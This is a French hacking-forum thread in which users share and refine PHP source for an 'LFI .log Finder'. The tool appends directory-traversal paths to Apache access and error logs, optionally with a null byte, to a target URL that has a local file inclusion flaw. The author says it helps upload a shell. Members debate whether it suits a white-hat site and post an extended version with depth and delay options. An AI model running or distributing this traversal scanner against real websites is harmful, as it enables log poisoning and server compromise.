LFI .log Finder (+ Source PHP)

[Hypnoze57]

Bonjour à tous ! Je vous présente la première version de mon LFI .log Finder.
Comme son nom l'indique, ce programme va rechercher les fichiers logs via une local file inclusion (access et error) ce qui peut vous permettre d'uploader un shell ou autre.

Un petit screen :

Et le lien : http://microglobe.p.ht/lfi_log/

Source:

Code PHP :

<?php
/****************************/
/* Tools coded by Hypnoze57 */
/****************************/

$array = array(
'../logs/access.log',
'../logs/access_log',
'../logs/error.log',
'../logs/error_log',
'../apache/logs/error.log',
'../apache/logs/access.log',
'../../apache/logs/error.log',
'../../apache/logs/access.log',
'../../../apache/logs/error.log',
'../../../apache/logs/access.log',
'../../../../../../../etc/httpd/logs/acces_log',
'../../../../../../../etc/httpd/logs/acces.log',
'../../../../../../../etc/httpd/logs/error_log',
'../../../../../../../etc/httpd/logs/error.log',
'../../../../../../../var/www/logs/access_log',
'../../../../../../../var/www/logs/access.log',
'../../../../../../../usr/local/apache/logs/access_log',
'../../../../../../../usr/local/apache/logs/access.log',
'../../../../../../../var/log/apache/access_log',
'../../../../../../../var/log/apache2/access_log',
'../../../../../../../var/log/apache/access.log',
'../../../../../../../var/log/apache2/access.log',
'../../../../../../../var/log/access_log',
'../../../../../../../var/log/access.log',
'../../../../../../../var/www/logs/error_log',
'../../../../../../../var/www/logs/error.log',
'../../../../../../../usr/local/apache/logs/error_log',
'../../../../../../../usr/local/apache/logs/error.log',
'../../../../../../../var/log/apache/error_log',
'../../../../../../../var/log/apache2/error_log',
'../../../../../../../var/log/apache/error.log',
'../../../../../../../var/log/apache2/error.log',
'../../../../../../../var/log/error_log',
'../../../../../../../var/log/error.log');
?>
<!DOCTYPE html>
<html>
    <head>
        <meta charset="utf-8" />
        <link rel="stylesheet" href="style.css" />
        <link rel="shortcut icon" href="icon.png">
        <title>LFI .log Finder</title>
    </head>
    <header>
    <center>
    <PRE>
  _     _____ ___     _               _____ _           _           
 | |   |  ___|_ _|   | | ___   __ _  |  ___(_)_ __   __| | ___ _ __ 
 | |   | |_   | |    | |/ _ \ / _` | | |_  | | '_ \ / _` |/ _ \ '__|
 | |___|  _|  | |   _| | (_) | (_| | |  _| | | | | | (_| |  __/ |   
 |_____|_|   |___| (_)_|\___/ \__, | |_|   |_|_| |_|\__,_|\___|_|   
                              |___/                                 
    </PRE>
    </center>
    </header>
    <body>
    <form action="" method="post">
    URL: <input type="text" name="url" size="50" placeholder="http://site.com/page.php?page=" /><br />
    Null Byte (%00): <input type="checkbox" name="nullbyte" value="true"><br />
    <input type="submit" value="Search!" />
    </form>
<?php
if(isset($_POST['url']) && !empty($_POST['url']) && !is_array($_POST['url'])) {
    $poison = false;
    if(isset($_POST['nullbyte'])) $poison = true;
    $url = urldecode(htmlentities($_POST['url'], ENT_QUOTES));
    $nb = count($array) - 1;
    echo '<ul>';
    for($i=0;$i<=$nb;$i++) {
        $lien = $url.$array[$i]; if($poison == true) { $lien .= '%00'; }
        $pg = file_get_contents($lien);
        if(preg_match('#Warning: include|<b>Warning</b>:  include|Warning:  include|<b>Warning:</b> include#', $pg)) {
            echo '<li><a href="'.$lien.'">'.$lien.'</a></li> <font color="red">[#]Not found!</font>';
        } else {
            echo '<li><a class="green" href="'.$lien.'">'.$lien.'</a></li> <font color="orange">[~] Found!</font>';
        }
    }
    echo '</ul>';
}
?>
    </body>
<footer>
    <center><br /><br />&copy; 2013 Hypnoze57</center>
</footer>
</html> 


Cordialement.

[Kiwazaru]

Sur un site white hat, ça le fait pas trop...

[Hypnoze57]

Sur un site white hat, ça le fait pas trop...

C'est effectivement l'idée que je m'étais faite au début. Mais j'en ai au préalable discuter avec supersnail !
*EDIT: Et c'est juste pour le principe de l'outil.. Il y a bien des tutoriels de hacking alors pourquoi pas des outils..

[Shirobi]

Sur un site white hat, ça le fait pas trop...

Ca peut servir pour les challs et verifier nos sites... sinon C'est pas trop chapeau blanc...


Meme moi qui ne code pas bcp php ca m'a l'air facile a faire, Je me trompe?

[Hypnoze57]

Sur un site white hat, ça le fait pas trop...

Ca peut servir pour les challs et verifier nos sites... sinon C'est pas trop chapeau blanc...


Meme moi qui ne code pas bcp php ca m'a l'air facile a faire, Je me trompe?

Ce n'est pas compliquer ! Il faut un minimum de connaissances.

[Kiwazaru]

Je dit pas que c'est anti-white hat, mais je dit juste qu'il faut que tu précise l'utilisation qui doit être faite de l’outil

[Di0Sasm]

Bon l'outil par lui même me dérange pas, mais avec un bout de code plutôt qu'une url et un bout des logs qu'il vérifie auraient plus instructif que ça .

[Hypnoze57]

Topic mis à jour ! Source ajouté !

[Swissky]

Code source intéressant , merci du post, tu pourrais peut-être améliorer le tool, en faisant une boucle qui testerait plus de possibilité de répertoire. Je m'explique :

Code PHP :

$i =0;
while($i < 10)
{
$checkpath = "../".$checkpath;
$i++;
} 


Avec checkpath , la variable contenant "../logs/access.log", cela permet de trouver quand même la LFI dans un cas où il y aurait plus de dossier

[InstinctHack]

@Swissky, t'es sûrr de ton code ? Tu pense pas ce qu'était ça l'idée :

Code PHP :


<?php
for($i=0;$i<10;$i++)
{
$checkpath = str_repeat("../",$i).$checkpath;
}
 

@Hypnoze57
!is_array($_POST['url']) // condition inutile, car les variables get/post meme ayant une forme valide d'array php, sont considéré comme des chaines de caractères ( sauf grosse erreur de ma part)

EDIT : je propose ma version (qui n'est d'autre que celle de Hypnoze57 mais plus flexible et avec un peu plus de fonctionnalités)

Code PHP :


<?php
/****************************/
/*     Tools coded by       */
/*    Hypnoze57 && Khaled   */
/****************************/
$directory = array(
'logs/',
'apache/logs/',
'etc/httpd/logs/',
'var/www/logs/',
'usr/local/apache/logs/',
'var/log/apache/',
'var/log/apache2/',
'var/log/',
);

$file=array(
    'access_log',
    'error_log',
);

foreach($file as $key1=>$value1)
{
    $file[]=str_replace('_','.',$value1);
}

?>
<!DOCTYPE html>
<html>
    <head>
        <meta charset="utf-8" />
        <link rel="stylesheet" href="style.css" />
        <link rel="shortcut icon" href="icon.png">
        <title>LFI .log Finder</title>
    </head>
    <body>
        <header style="text-align:center">
                <PRE>
  _     _____ ___     _               _____ _           _          
 | |   |  ___|_ _|   | | ___   __ _  |  ___(_)_ __   __| | ___ _ __
 | |   | |_   | |    | |/ _ \ / _` | | |_  | | '_ \ / _` |/ _ \ '__|
 | |___|  _|  | |   _| | (_) | (_| | |  _| | | | | | (_| |  __/ |  
 |_____|_|   |___| (_)_|\___/ \__, | |_|   |_|_| |_|\__,_|\___|_|  
                              |___/                                
                </PRE>
        </header>
        <form action="" method="post">
            URL: <input type="text" name="url" size="50" placeholder="http://site.com/page.php?page=" /><br />
            Null Byte (%00): <input type="checkbox" name="nullbyte" value="true"><br />
              Sleep : <input type="input" name="sleep" value="0.5"><br />
           Depth : <input type="input" name="depth" value="3"><br />


            <input type="submit" value="Search!" />

        </form>
<?php
if(isset($_POST['url']) && !empty($_POST['url']))
{
    $url = urldecode(htmlentities($_POST['url'], ENT_QUOTES));
    echo '<ul>';

    if(isset($_POST['nullbyte']))
    {
        foreach($file as $key1=>$value1)
        {
            $file[]=$value1.'%00';
        }
    }
    if(isset($_POST['sleep']))
    {
        if(is_numeric($_POST['sleep']))
        {
            $sleep=$_POST['sleep'];
        }
        else
        {
            $sleep=0.5;
        }
    }
    else
    {
        $sleep=0;
    }

    if(isset($_POST['depth']))
    {
        if(is_int($_POST['depth']))
        {
            $depth=$_POST['depth'];        
        }
        else
        {
            $depth=3;
        }
    }
    else
    {
        $depth=0;        
    }

    foreach($directory as $key1=>$value1)
    {
        foreach($file as $key2=>$value2)
        {
            for($i=1;$i<$depth;$i++)
            {
                $path=str_repeat("../",$i).$value1.$value2;
                echo '<li>';
                    echo "<a href='$path'>$path</a>";
                    if(preg_match('#Warning: include|<b>Warning</b>:  include|Warning:  include|<b>Warning:</b> include#', file_get_contents($path)))
                    {
                        echo '<span style="color:red;">[#]Not found!</span>';
                    }
                    else
                    {
                        echo '<span style="color:orange;">[~] Found!</span>';
                    }
                echo '</li>';
            }
        }
    }
    echo '</ul>';
}
?>
        <footer style="text-align:center">
            2013 Hypnoze57 && Khaled
        </footer>
    </body>
</html>
 

(je passe sur les balises <center>/<font> obsolète, les <header>/<footer> hors du <body> :p )

[Swissky]

Ah mais j'ai mis un code bidon pour expliquer l'idée xD (je ne l'ai pas testé, il fonctionne peut-être ^^')
Mais oui tu as bien saisi l'idée

[Hypnoze57]

@Hypnoze57
!is_array($_POST['url']) // condition inutile, car les variables get/post meme ayant une forme valide d'array php, sont considéré comme des chaines de caractères ( sauf grosse erreur de ma part)

is_array sert à protéger la variable des Full Path Disclosure !
Sinon pas mal ton code !